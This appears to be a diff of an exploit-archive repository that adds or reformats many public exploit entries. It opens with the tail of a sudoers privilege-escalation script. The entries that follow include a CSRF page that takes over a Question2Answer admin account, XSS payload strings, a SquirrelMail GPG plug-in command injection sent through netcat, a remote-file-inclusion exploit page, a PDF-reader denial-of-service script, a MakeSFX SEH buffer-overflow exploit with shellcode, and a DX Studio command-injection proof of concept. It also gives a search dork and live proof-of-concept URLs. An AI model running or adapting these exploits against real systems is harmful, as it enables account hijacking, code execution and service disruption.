while os.stat("/etc/sudoers").st_size == s:
sys.stderr.write(".")
time.sleep(1)
sys.stderr.write("\ndone\n")
os.system("sudo su")

48
platforms/php/webapps/38372.html Executable file
View file

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/58414/info
Question2Answer is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Question2Answer 1.5.4 is vulnerable; other versions may also be affected.
<html>
<head>
<title>Exploit for stealing admin's account in Question2Answer. Made by
MustLive. http://www.example.com</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
for (var i=1;i<=2;i++) {
var ifr = document.createElement("iframe");
ifr.setAttribute('name', 'csrf'+i);
ifr.setAttribute('width', '0');
ifr.setAttribute('height', '0');
document.body.appendChild(ifr);
}
CSRF1();
setTimeout(CSRF2,1000);
}
function CSRF1() {
window.frames["csrf1"].document.body.innerHTML = '<form name="hack"
action="http://www.example.com/account"; method="post">n<input type="hidden"
name="handle" value="test">n<input type="hidden" name="email"
value="email () attacker com">n<input type="hidden" name="messages"
value="1">n<input type="hidden" name="mailings" value="1">n<input
type="hidden" name="field_1" value="test">n<input type="hidden"
name="field_2" value="test">n<input type="hidden" name="field_3"
value="test">n<input type="hidden" name="dosaveprofile"
value="1">n</form>';
window.frames["csrf1"].document.hack.submit();
}
function CSRF2() {
window.frames["csrf2"].document.body.innerHTML = '<form name="hack"
action="http://www.example.com/attack.php"; method="post">n<input type="hidden"
name="do" value="1">n</form>';
window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>

9
platforms/php/webapps/38373.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58415/info
The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

13
platforms/php/webapps/38374.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/58417/info
SWFUpload is prone to multiple cross-site scripting and content spoofing vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Content spoofing:
http://www.example.com/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
Cross-site scripting:
http://www.example.com/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

7
platforms/php/webapps/38375.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/58418/info
Asteriskguru Queue Statistics is prone to an cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/public/error.php?warning=<XSS injection>

9
platforms/php/webapps/38376.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58421/info
The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
podPress 8.8.10.13 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//

32
platforms/php/webapps/38377.txt Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/58425/info
Privoxy is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.
Privoxy 3.0.20 is affected; other versions may also be vulnerable.
Response Code (current).: 407
Response Headers (as seen by your browser).:
HTTP/1.1 407 Proxy Authentication Required
Date: Mon, 11 Mar 2013 17:01:59 GMT
Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
Proxy-Authenticate: Basic
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 571
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Request Headers (as seen by the remote website)
Host: c22.cc
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/
Connection: keep-alive

100
platforms/php/webapps/4173.txt
View file

@ -1,50 +1,50 @@
SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
Bugtraq ID: 24782
-----------------------------
There are various vulnerabilities in this software! One is in
keyring_main.php!
$fpr is not escaped from shellcommands!
testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#
***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |
&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1
...
testbox:/home/w00t# cat /tmp/w00t
testbox:/home/w00t#
So we just executed 'touch /tmp/w00t'!
WabiSabiLabi tries to sell the exploit for 700 Euro! ;)
lol @ WabiSabiLabi!
Greets:
oli and all members of jmp-esp!
jmp-esp is looking for people who are interested in IT security!
Currently we are looking for people who like to write articles for a
German ezine or are interested in exchanging informations, exploits...
IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)
#main
# milw0rm.com [2007-07-11]
SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
Bugtraq ID: 24782
-----------------------------
There are various vulnerabilities in this software! One is in
keyring_main.php!
$fpr is not escaped from shellcommands!
testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#
***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |
&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1
...
testbox:/home/w00t# cat /tmp/w00t
testbox:/home/w00t#
So we just executed 'touch /tmp/w00t'!
WabiSabiLabi tries to sell the exploit for 700 Euro! ;)
lol @ WabiSabiLabi!
Greets:
oli and all members of jmp-esp!
jmp-esp is looking for people who are interested in IT security!
Currently we are looking for people who like to write articles for a
German ezine or are interested in exchanging informations, exploits...
IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)
#main
# milw0rm.com [2007-07-11]

116
platforms/php/webapps/5417.htm
View file

@ -1,58 +1,58 @@
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title>
<script language="JavaScript">
//'Bug found and Exploit coded by bd0rk
//'Vendor: http://www.foxymods-phpbb.com/
//'Download: http://www.foxymods-phpbb.com/download.php?id=7
//'Contact: bd0rk[at]hackermail.com
//'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx);
//'$phpbb_root_path is not declared before include
//'Greetings: str0ke, TheJT, rgod, Frauenarzt
//#The german Hacker bd0rk
var dir="/includes/"
var file="/functions_portal.php?"
var parameter ="phpbb_root_path="
var shell="Insert your shellcode here"
function command() {
if (document.rfi.target1.value==""){
alert("Exploit failed...");
return false;
}
rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
rfi.submit();
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p>
<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
</font><font color="#FF0000" size="2">&nbsp;</font></b>
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>
<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
</center>
</body>
</html>
# milw0rm.com [2008-04-09]
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title>
<script language="JavaScript">
//'Bug found and Exploit coded by bd0rk
//'Vendor: http://www.foxymods-phpbb.com/
//'Download: http://www.foxymods-phpbb.com/download.php?id=7
//'Contact: bd0rk[at]hackermail.com
//'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx);
//'$phpbb_root_path is not declared before include
//'Greetings: str0ke, TheJT, rgod, Frauenarzt
//#The german Hacker bd0rk
var dir="/includes/"
var file="/functions_portal.php?"
var parameter ="phpbb_root_path="
var shell="Insert your shellcode here"
function command() {
if (document.rfi.target1.value==""){
alert("Exploit failed...");
return false;
}
rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
rfi.submit();
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p>
<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
</font><font color="#FF0000" size="2">&nbsp;</font></b>
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>
<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
</center>
</body>
</html>
# milw0rm.com [2008-04-09]

76
platforms/php/webapps/8965.txt
View file

@ -1,38 +1,38 @@
vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability
About:-
Radio and TV Add-on will add a radio and TV library to your forum.
Features:-
- Users can add / delete / edit own stations
For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2
Note:-
- To exploit this Bug need to be registred!and after you are registered you can add new radio station
where name station can be "><script>alert(String.fromCharCode(88,83,83))</script>
and URL "><script>alert(String.fromCharCode(88,83,83))</script>
Poc: XSS
http://www.musicadigitale.net/forum/radioandtv.php?station=92
Poc: Iframe
http://www.musicadigitale.net/forum/radioandtv.php?station=93
Poc: Redirect
http://www.musicadigitale.net/forum/radioandtv.php?station=94
dorks:- inurl:radioandtv.php
Bug founded by d3v1l [Avram Marius]
Date: 14.06.2009
# milw0rm.com [2009-06-15]
vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability
About:-
Radio and TV Add-on will add a radio and TV library to your forum.
Features:-
- Users can add / delete / edit own stations
For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2
Note:-
- To exploit this Bug need to be registred!and after you are registered you can add new radio station
where name station can be "><script>alert(String.fromCharCode(88,83,83))</script>
and URL "><script>alert(String.fromCharCode(88,83,83))</script>
Poc: XSS
http://www.musicadigitale.net/forum/radioandtv.php?station=92
Poc: Iframe
http://www.musicadigitale.net/forum/radioandtv.php?station=93
Poc: Redirect
http://www.musicadigitale.net/forum/radioandtv.php?station=94
dorks:- inurl:radioandtv.php
Bug founded by d3v1l [Avram Marius]
Date: 14.06.2009
# milw0rm.com [2009-06-15]

144
platforms/windows/dos/3430.html
View file

@ -1,72 +1,72 @@
<!--------------------------------------------------------------------------------
Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Consumption
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org
Well, Adobe guys do a good job after the publication of a variety of
bug in AcroPDF.dll, one for all
From Secunia:
"Input passed to a hosted PDF file is not properly sanitised by the
browser plug-in before being returned to users. This can be exploited
to execute arbitrary script code in a user's browser session in context
of an affected site."
So now the dll is able to understand when you're trying to insert something
wrong prompting you with "One or more of the query terms are too long."
and that's a good thing but... I thought "can this dll sanitise chars like
%n"
Well the answer is: no.
Unfortunately (sure depends by the point of view) Internet Explorer is
not useful for a test 'cause a limited number of chars (only 2083) is
admitted
in the address bar, so we need to use browser like Firefox and stuff like
that.
When you browse to a hosted pdf file like this
http://somesite/poc.pdf#search=%n%n%n... x 10000 (or much more if you like)
the browse will stop to answer until the process AcroRd32.exe crashes,
the CPU usage is about 50-60% and the paging file usage grow until
it's full and you have the message "Insufficient virtual memory..."
Here's a proof of concept, for online demonstration see:
http://www.shinnai.altervista.org/adobe.html
txt version here: http://www.shinnai.altervista.org/txt/adobe.txt
-------------------------------------------------------------------------------->
<script language="javascript">
var browserName=navigator.appName;
if (browserName=="Netscape")
{var f = ""
var c = ""
for (var i = 0; i <= 10000; i++) {
var f = f + "%n";
}
document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" +
(f)
}
else if (browserName=='Opera')
{var f = ""
var c = ""
for (var i = 0; i <= 10000; i++) {
var f = f + "%n";
}
document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" +
(f)
}
else if (browserName=='Microsoft Internet Explorer')
{
alert("This exploit doesn't work with IE. You need to use Firefox and stuff
like that.");
document.location="http://www.shinnai.altervista.org";
}
else
{
alert("Mmm... I don't know what are you browsing with here, so no martini no
party.");
}
</script>
# milw0rm.com [2007-03-08]
<!--------------------------------------------------------------------------------
Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Consumption
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org
Well, Adobe guys do a good job after the publication of a variety of
bug in AcroPDF.dll, one for all
From Secunia:
"Input passed to a hosted PDF file is not properly sanitised by the
browser plug-in before being returned to users. This can be exploited
to execute arbitrary script code in a user's browser session in context
of an affected site."
So now the dll is able to understand when you're trying to insert something
wrong prompting you with "One or more of the query terms are too long."
and that's a good thing but... I thought "can this dll sanitise chars like
%n"
Well the answer is: no.
Unfortunately (sure depends by the point of view) Internet Explorer is
not useful for a test 'cause a limited number of chars (only 2083) is
admitted
in the address bar, so we need to use browser like Firefox and stuff like
that.
When you browse to a hosted pdf file like this
http://somesite/poc.pdf#search=%n%n%n... x 10000 (or much more if you like)
the browse will stop to answer until the process AcroRd32.exe crashes,
the CPU usage is about 50-60% and the paging file usage grow until
it's full and you have the message "Insufficient virtual memory..."
Here's a proof of concept, for online demonstration see:
http://www.shinnai.altervista.org/adobe.html
txt version here: http://www.shinnai.altervista.org/txt/adobe.txt
-------------------------------------------------------------------------------->
<script language="javascript">
var browserName=navigator.appName;
if (browserName=="Netscape")
{var f = ""
var c = ""
for (var i = 0; i <= 10000; i++) {
var f = f + "%n";
}
document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" +
(f)
}
else if (browserName=='Opera')
{var f = ""
var c = ""
for (var i = 0; i <= 10000; i++) {
var f = f + "%n";
}
document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" +
(f)
}
else if (browserName=='Microsoft Internet Explorer')
{
alert("This exploit doesn't work with IE. You need to use Firefox and stuff
like that.");
document.location="http://www.shinnai.altervista.org";
}
else
{
alert("Mmm... I don't know what are you browsing with here, so no martini no
party.");
}
</script>
# milw0rm.com [2007-03-08]

31
platforms/windows/local/38362.py
View file

@ -16,7 +16,7 @@ freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe
Vulnerable Product:
==================================================
MakeSFX.exe v1.44
MakeSFX.exe v1.44
Mar 19 2001 & Dec 10 2009 versions
@ -47,20 +47,14 @@ makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"]
etc...
The '/title' argument when supplied an overly long payload will overwrite
NSEH & SEH exception handlers
causing buffer overflow, we can then execute our aribitrary shellcode. I
have seen some applications using
MakeSFX.exe from .bat files for some automation purposes, if the local .bat
file is replaced by malicious
The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers
causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using
MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious
one attackers can cause mayhem on the system.
Both versions from 2001 & 2009 are vulnerable but exploit setup will be off
by 20 bytes.
punksnotdead="A"*1078+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
v1.44 (Dec 10 2009)
punksnotdead="A"*1158+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
v1.44 (Mar 19 2001)
Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes.
punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009)
punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001)
POC exploit code(s):
@ -68,10 +62,8 @@ POC exploit code(s):
We will exploit MakeSFX v1.44 (Mar 19 2001).
I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH,
Rebase all set to False, but it contains null 0x00.
So no suitable SEH instruction address avail, I will instead have to use
mona.py to look for POP,POP,RET instruction
I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00.
So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction
in outside modules and we find some...
e.g.
@ -102,7 +94,7 @@ sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
nseh="\xEB\x06"+"\x90"*2
seh=struct.pack('<L', 0x76F29529)
punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10
punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10
subprocess.Popen([pgm, punksnotdead], shell=False)
@ -129,8 +121,7 @@ Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained
the author. The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

4
platforms/windows/remote/22142.c
View file

@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/6582/info
// source: http://www.securityfocus.com/bid/6582/info
It has been reported that the Half-Life client contains a format string vulnerability. When receiving messages from an administrator through the adminmod add-on package, the client does not properly handle input. This could result in denial of service, or code execution.
// It has been reported that the Half-Life client contains a format string vulnerability. When receiving messages from an administrator through the adminmod add-on package, the client does not properly handle input. This could result in denial of service, or code execution.
/*****************************************************************
* hoagie_adminmod_client.c

6
platforms/windows/remote/22966.c
View file

@ -1,8 +1,8 @@
source: http://www.securityfocus.com/bid/8299/info
// source: http://www.securityfocus.com/bid/8299/info
Half-Life Client has been reported prone to a remotely exploitable buffer overflow condition.
// Half-Life Client has been reported prone to a remotely exploitable buffer overflow condition.
The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client.
// The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client.
/*
* m00 Security presents

434
platforms/windows/remote/8922.txt
View file

@ -1,217 +1,217 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
DX Studio Player Firefox plug-in command injection
1. *Advisory Information*
Title: DX Studio Player Firefox plug-in command injection
Advisory ID: CORE-2009-0521
Advisory URL:
http://www.coresecurity.com/content/DXStudio-player-firefox-plugin
Date published: 2009-06-09
Date of last update: 2009-06-09
Vendors contacted: Worldweaver
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Command injection
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-2011
3. *Vulnerability Description*
DX Studio [1] is a complete integrated development environment for
creating interactive 3D graphics. DX Studio Player plug-in for Firefox
[2] is vulnerable to a remote command execution vulnerability.
4. *Vulnerable packages*
. DX Studio Player v3.0.29.0
. DX Studio Player v3.0.22.0
. DX Studio Player v3.0.12.0
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. DX Studio Player v3.0.29.1
6. *Vendor Information, Solutions and Workarounds*
On June 1st DXStudio team patched the current release 3.0.29 to 3.0.29.1
for all new downloads to fix the problem with the Firefox plugin, and
also posted a sticky announce for all its users [3].
7. *Credits*
This vulnerability was discovered and researched by Diego Juarez from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
DX Studio is a complete integrated development environment for creating
interactive 3D graphics. DX Studio provides a javascript API in which
the method 'shell.execute()' is defined as follows:
/-----------
Prototype:
shell.execute(commandString, [paramString], [commandIsProgId]);
- -----------/
This method sends the 'commandString' to the Windows shell with optional
parameters in 'paramString'. For security reasons, this function is not
available when running in a web browser. If you set 'commandIsProgId' to
true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with
parameter 'play' would play a DVD in Windows Media Player.
In our tests, despite what is stated in the documentation, we found that
the function is actually available to both the Internet Explorer and
Firefox browser plug-ins. In the IE plug-in the user does get a warning
about the security implications of allowing such '.dxstudio' file to
run. On Firefox however, there is no such warning whatsoever, allowing
an attacker to execute arbitrary code on the client side by luring the
victim into clicking a link or visiting a malicious website.
8.1. *Proof of Concept (header.xml)*
/-----------
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<dxstudio version="1.0.0" width="800" height="600"
defaultscriptlanguage="javascript">
<display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no"
maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes"
changeresolution="no" userresize="yes" workarea="no" windowmask="no"
src="" minplayerversion="1.0.0">
<loading console="yes" custom="no" custombackground="no"
customlogo="yes" showversion="no">
<prop id="background" type="color" r="0" g="0" b="0" a="1" />
<logo src="" />
<customprogress />
</loading>
</display>
<script>
<![CDATA[function onInit()
{
shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.")
} ] ]>
</script>
<licenseinfo stamp="cgdaaaaa" />
<security>
<prop id="password" type="string" value="" />
<prop id="allowplayer" type="bool" state="no" />
<prop id="nocache" type="bool" state="yes" />
</security>
</dxstudio>
- -----------/
Note: The security vulnerability is also exploitable on the standalone
player, however, this functionality appears to be the expected behavior
and fully intended for the standalone player.
9. *Report Timeline*
. 2009-05-21:
Core Security Technologies notifies the Worldweaver Support Team (WST)
of the vulnerability and announces its initial plan to publish the
content on June 15th, 2009.
. 2009-05-26:
The WST asks Core for a technical description of the vulnerability.
. 2009-05-26:
Technical details sent to WST by Core.
. 2009-06-08:
Core asks WST for an estimated date to fix this issue.
. 2009-06-08:
WST notifies Core that a fix has already been produced and it is
available to the users.
. 2009-06-09:
The advisory CORE-2009-0521 is published.
10. *References*
[1] http://www.dxstudio.com.
[2] http://www.dxstudio.com/download2.aspx.
[3]
http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q
PMPteYbShbRU4j4tIk93HPM=
=Mx5G
-----END PGP SIGNATURE-----
# milw0rm.com [2009-06-10]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
DX Studio Player Firefox plug-in command injection
1. *Advisory Information*
Title: DX Studio Player Firefox plug-in command injection
Advisory ID: CORE-2009-0521
Advisory URL:
http://www.coresecurity.com/content/DXStudio-player-firefox-plugin
Date published: 2009-06-09
Date of last update: 2009-06-09
Vendors contacted: Worldweaver
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Command injection
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-2011
3. *Vulnerability Description*
DX Studio [1] is a complete integrated development environment for
creating interactive 3D graphics. DX Studio Player plug-in for Firefox
[2] is vulnerable to a remote command execution vulnerability.
4. *Vulnerable packages*
. DX Studio Player v3.0.29.0
. DX Studio Player v3.0.22.0
. DX Studio Player v3.0.12.0
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. DX Studio Player v3.0.29.1
6. *Vendor Information, Solutions and Workarounds*
On June 1st DXStudio team patched the current release 3.0.29 to 3.0.29.1
for all new downloads to fix the problem with the Firefox plugin, and
also posted a sticky announce for all its users [3].
7. *Credits*
This vulnerability was discovered and researched by Diego Juarez from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
DX Studio is a complete integrated development environment for creating
interactive 3D graphics. DX Studio provides a javascript API in which
the method 'shell.execute()' is defined as follows:
/-----------
Prototype:
shell.execute(commandString, [paramString], [commandIsProgId]);
- -----------/
This method sends the 'commandString' to the Windows shell with optional
parameters in 'paramString'. For security reasons, this function is not
available when running in a web browser. If you set 'commandIsProgId' to
true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with
parameter 'play' would play a DVD in Windows Media Player.
In our tests, despite what is stated in the documentation, we found that
the function is actually available to both the Internet Explorer and
Firefox browser plug-ins. In the IE plug-in the user does get a warning
about the security implications of allowing such '.dxstudio' file to
run. On Firefox however, there is no such warning whatsoever, allowing
an attacker to execute arbitrary code on the client side by luring the
victim into clicking a link or visiting a malicious website.
8.1. *Proof of Concept (header.xml)*
/-----------
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<dxstudio version="1.0.0" width="800" height="600"
defaultscriptlanguage="javascript">
<display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no"
maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes"
changeresolution="no" userresize="yes" workarea="no" windowmask="no"
src="" minplayerversion="1.0.0">
<loading console="yes" custom="no" custombackground="no"
customlogo="yes" showversion="no">
<prop id="background" type="color" r="0" g="0" b="0" a="1" />
<logo src="" />
<customprogress />
</loading>
</display>
<script>
<![CDATA[function onInit()
{
shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.")
} ] ]>
</script>
<licenseinfo stamp="cgdaaaaa" />
<security>
<prop id="password" type="string" value="" />
<prop id="allowplayer" type="bool" state="no" />
<prop id="nocache" type="bool" state="yes" />
</security>
</dxstudio>
- -----------/
Note: The security vulnerability is also exploitable on the standalone
player, however, this functionality appears to be the expected behavior
and fully intended for the standalone player.
9. *Report Timeline*
. 2009-05-21:
Core Security Technologies notifies the Worldweaver Support Team (WST)
of the vulnerability and announces its initial plan to publish the
content on June 15th, 2009.
. 2009-05-26:
The WST asks Core for a technical description of the vulnerability.
. 2009-05-26:
Technical details sent to WST by Core.
. 2009-06-08:
Core asks WST for an estimated date to fix this issue.
. 2009-06-08:
WST notifies Core that a fix has already been produced and it is
available to the users.
. 2009-06-09:
The advisory CORE-2009-0521 is published.
10. *References*
[1] http://www.dxstudio.com.
[2] http://www.dxstudio.com/download2.aspx.
[3]
